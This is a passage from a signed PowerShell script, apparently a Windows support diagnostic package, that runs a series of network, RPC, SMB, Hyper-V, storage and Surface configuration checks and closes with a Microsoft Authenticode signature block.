Run-DiagExpression .\RC_HTTPRedirectionTSGateway.ps1
#_# [Idea ID 6530] [Windows] Check for any configured RPC port range which may cause issues with DCOM or DTC components
Run-DiagExpression .\TS_RPCPortRangeCheck.ps1
# [Idea ID 2387] [Windows] Verify if RPC connection are configured to accept only Authenticated sessions
Run-DiagExpression .\TS_RPCUnauthenticatedSessions.ps1
# SMB2ClientDriverStateCheck
Run-DiagExpression .\TS_SMB2ClientDriverStateCheck.ps1
# SMB2ServerDriverStateCheck
Run-DiagExpression .\TS_SMB2ServerDriverStateCheck.ps1
# Opportunistic Locking has been disabled and may impact performance.
Run-DiagExpression .\TS_LockingKB296264Check.ps1
# Evaluates whether InfocacheLevel should be increased to 0x10 hex. To resolve slow logon, slow boot issues.
Run-DiagExpression .\TS_InfoCacheLevelCheck.ps1
# RSASHA512 Certificate TLS 1.2 Compat Check
Run-DiagExpression .\TS_DetectSHA512-TLS.ps1
# IPv6Check
Run-DiagExpression .\TS_IPv6Check.ps1
# PMTU Check
Run-DiagExpression .\TS_PMTUCheck.ps1
# Detect MTU of 1514
Run-DiagExpression .\TS_DetectMTU1514.ps1
# Checks for modified TcpIP Reg Parameters and recommend KB
Run-DiagExpression .\TS_TCPIPSettingsCheck.ps1
# 'Checks if the number of 6to4 adapters is larger than the number of physical adapters
Run-DiagExpression .\TS_AdapterKB980486Check.ps1
#_# Checks files in the LanmanServer, if any at .PST files a file is created with listing all of the files in the directory
Run-DiagExpression .\TS_NetFilePSTCheck.ps1
# Checks if Windows Server 2008 R2 SP1, Hyper-V, and Tunnel.sys driver are installed if they are generate alert
Run-DiagExpression .\TS_ServerCoreKB978309Check.ps1
#_# Run-DiagExpression .\TS_DetectLowPathMTU.ps1
TS_DetectLowPathMTU.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_HyperV ---"
# Hyper-V Info
Run-DiagExpression .\TS_HyperVInfo.ps1
# Missing Hotfix
Run-DiagExpression .\TS_HyperVEvent106Check.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Storage ---"
# [Idea ID 7345] [Windows] Perfmon - Split IO Counter
Run-DiagExpression .\TS_DetectSplitIO.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_Surface ---"
# SurfaceDetectWifiDriverVersion
Run-DiagExpression .\TS_SurfaceDetectWifiDriverVersion.ps1
# SurfaceDetectFirmwareVersions
Run-DiagExpression .\TS_SurfaceDetectFirmwareVersions.ps1
# SurfacePro3DetectWifiDriverVersion
Run-DiagExpression .\TS_SurfacePro3DetectWifiDriverVersion.ps1
# SurfacePro3DetectFirmwareVersions
Run-DiagExpression .\TS_SurfacePro3DetectFirmwareVersions.ps1
# SurfaceDetectConnectedStandbyStatus
Run-DiagExpression .\TS_SurfaceDetectConnectedStandbyStatus.ps1
# SurfacePro3DetectConnectedStandbyStatus
Run-DiagExpression .\TS_SurfacePro3DetectConnectedStandbyStatus.ps1
# SurfacePro3DetectConnectedStandbyHibernationConfig
Run-DiagExpression .\TS_SurfacePro3DetectConnectedStandbyHibernationConfig.ps1
Write-Host -BackgroundColor Gray -ForegroundColor Black -Object " --- $(Get-Date -Format 'yy-mm-dd HH:mm:ss') $Global:SDPtech - Diag Phase module: TS_3rd party ---"
# [Idea ID 7521] [Windows] McAfee HIPS 7.0 adds numerous extraneous network adapter interfaces to registry
Run-DiagExpression .\TS_McAfeeHIPS70Check.ps1
# Symantec Intrusion Prevenstion System Check
Run-DiagExpression .\TS_SymantecIPSCheck.ps1
}
# Hotfix Rollups
Run-DiagExpression .\DC_HotfixRollups.ps1
$stopTime_AutoAdd = Get-Date
$duration = $(New-TimeSpan -Start $startTime_AutoAdd -End $stopTime_AutoAdd)
Write-Host "*** $(Get-Date -UFormat "%R:%S") DONE (Dur: $duration) TS_AutoAddCommands_NET.ps1 SkipTS: $Global:skipTS - SkipBPA: $Global:skipBPA"
# SIG # Begin signature block
# MIIoUgYJKoZIhvcNAQcCoIIoQzCCKD8CAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDbL8u9CdFThg9F
# 8orFwFNnad57AXAi52b5Voz1hw3LjqCCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiMwghofAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIO4t
# odBH+y28dRKkrD08O0faooTEtMkhrwHsEtR12WnTMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAjD6HnmClYuhwB6hdKHSogPw1098whGEM90xu
# rfPt/1m7vtTyQX4AYIWfOP2XsQLdHu4pn6Y47jHecz1gphUA9CPj5+XMYzzQs6Q2
# DivmMYKuIoKrmn2EmWPg8eTOrcJ8uMPk6GpXMXnK/qLJNvfXZ8nO/qa6woG+v1IW
# 3PhGafp8kMRqSMjvMMrEKsKY3xxV8k9LV97wELlWd4Ruuww0VGaqoAg+TgjPUUGX
# yaGZ8yuOhj44R98kDNKd8BoDdqK5uJqgJNeWdiCS1bPI1BQCiYy1K5ysMx0+Ut8r
# 1jnATqN0NVD9D1M7VLgN7YNK2Araw3wiYSdWWzsWNdxIRZxBlqGCF60wghepBgor
# BgEEAYI3AwMBMYIXmTCCF5UGCSqGSIb3DQEHAqCCF4YwgheCAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCApI4oJI4DVSeH3YbKW88udsk2dfESNFAEh
# qkHnwIa/wQIGZv8ZfhGeGBMyMDI0MTAyODExNDA0MC4yODZaMASAAgH0oIHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo2QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEfswggcoMIIFEKADAgECAhMzAAAB9oMv
# JmpUXSLBAAEAAAH2MA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEwNFoXDTI1MTAyMjE4MzEwNFowgdMxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv
# c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs
# ZCBUU1MgRVNOOjZCMDUtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt
# ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA
# 0UJeLMR/N9WPBZhuKVFF+eWJZ68Wujdj4X6JR05cxO5CepNXo17rVazwWLkm5Aja
# Vh19ZVjDChHzimxsoaXxNu8IDggKwpXvpAAItv4Ux50e9S2uVwfKv57p9JKG+Q7V
# ONShujl1NCMkcgSrPdmd/8zcsmhzcNobLomrCAIORZ8IwhYy4siVQlf1NKhlyAzm
# kWJD0N+60IiogFBzg3yISsvroOx0x1xSi2PiRIQlTXE74MggZDIDKqH/hb9FT2kK
# /nV/aXjuo9LMrrRmn44oYYADe/rO95F+SG3uuuhf+H4IriXr0h9ptA6SwHJPS2Vm
# bNWCjQWq5G4YkrcqbPMax7vNXUwu7T65E8fFPd1IuE9RsG4TMAV7XkXBopmPNfvL
# 0hjxg44kpQn384V46o+zdQqy5K9dDlWm/J6vZtp5yA1PyD3w+HbGubS0niEQ1L6w
# GOrPfzIm0FdOn+xFo48ERl+Fxw/3OvXM5CY1EqnzEznPjzJc7OJwhJVR3VQDHjBc
# EFTOvS9E0diNu1eocw+ZCkz4Pu/oQv+gqU+bfxL8e7PFktfRDlM6FyOzjP4zuI25
# gD8tO9zJg6g6fRpaZc439mAbkl3zCVzTLDgchv6SxQajJtvvoQaZxQf0tRiPcbr2
# HWfMoqqd9uiQ0hTUEhG44FBSTeUPZeEenRCWadCW4G8CAwEAAaOCAUkwggFFMB0G
# A1UdDgQWBBRIwZsJuOcJfScPWcXZuBA4B89K8jAfBgNVHSMEGDAWgBSfpxVdAF5i
# XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv
# c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB
# JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw
# Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp
# bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud
# JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF
# AAOCAgEA13kBirH1cHu1WYR1ysj125omGtQ0PaQkEzwGb70xtqSoI+svQihsgdTY
# xaPfp2IVFdgjaMaBi81wB8/nu866FfFKKdhdp3wnMZ91PpP4Ooe7Ncf6qICkgSuw
# gdIdQvqE0h8VQ5QW5sDV4Q0Jnj4f7KHYx4NiM8C4jTw8SQtsuxWiTH2Hikf3QYB7
# 1a7dB9zgHOkW0hgUEeWO9mh2wWqYS/Q48ASjOqYw/ha54oVOff22WaoH+/Hxd9NT
# EU/4vlvsRIMWT0jsnNI71jVArT4Q9Bt6VShWzyqraE6SKUoZrEwBpVsI0LMg2X3h
# OLblC1vxM3+wMyOh97aFOs7sFnuemtI2Mfj8qg16BZTJxXlpPurWrG+OBj4BoTDk
# C9AxXYB3yEtuwMs7pRWLyxIxw/wV9THKUGm+x+VE0POLwkrSMgjulSXkpfELHWWi
# CVslJbFIIB/4Alv+jQJSKAJuo9CErbm2qeDk/zjJYlYaVGMyKuYZ+uSRVKB2qkEP
# cEzG1dO9zIa1Mp32J+zzW3P7suJfjw62s3hDOLk+6lMQOR04x+2o17G3LceLkkxJ
# m41ErdiTjAmdClen9yl6HgMpGS4okjFCJX+CpOFX7gBA3PVxQWubisAQbL5HgTFB
# tQNEzcCdh1GYw/6nzzNNt+0GQnnobBddfOAiqkzvItqXjvGyK1QwggdxMIIFWaAD
# AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD
# VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
# MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv
# ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy
# MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5
# vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64
# NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu
# je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl
# 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg
# yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I
# 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2
# ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/
# TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy
# 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y
# 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H
# XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB
# AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW
# BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B
# ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB
# BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB
# Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL
# oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv
# TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr
# BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS
# b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq
# reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27
# DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv
# vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak
# vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK
# NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2
# kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+
# c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep
# 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk
# txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg
# DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/
# 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDVjCCAj4CAQEwggEBoYHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo2QjA1LTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAFU9eSpdxs0a0
# 6JFIuGFHIj/I+36ggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDANBgkqhkiG9w0BAQsFAAIFAOrJ4u8wIhgPMjAyNDEwMjgxMDE2MTVaGA8yMDI0
# MTAyOTEwMTYxNVowdDA6BgorBgEEAYRZCgQBMSwwKjAKAgUA6sni7wIBADAHAgEA
# AgIV+jAHAgEAAgISoDAKAgUA6ss0bwIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgor
# BgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUA
# A4IBAQBpUFU4+vZJFyUmVb+WZWIYm85wWkaqUQMIXDa89AJRdEINZBYYuKJZHwGX
# evIycaqI5McGg28UnXlT85+VLHcRb2BqTBqlUDfyWMDDSi4/Ny1o+ihFohhs/ujQ
# uxkh2lsfu3f8RO+rHyvyoc6aVYoXpbsYsPsvWhlP5VIY3yXO7ztB9TdvoXXfsSMI
# GgIOURNjC5+mH+r4R0gkgrO/9ZkBSWax/DoAQGEOAQy9s6WfhPW9PTxIBkjbYnEx
# w84j1PW/7aPVhavzoHfT0fP7eh9eCNY9ax+AXoa/pOOruFzpjML3/3o9VRglqy6j
# vcBxO0h6Uf9FkqnHwg7BsMcIWiqvMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAH2gy8malRdIsEAAQAAAfYwDQYJYIZIAWUD
# BAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0B
# CQQxIgQg2ti6QJwtOddb7OZQIgw7oLpz01PEZzzGKwBd536wAlcwgfoGCyqGSIb3
# DQEJEAIvMYHqMIHnMIHkMIG9BCArYUzxlF6m5USLS4f8NXL/8aoNEVdsCZRmF+Ll
# QjG2ojCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
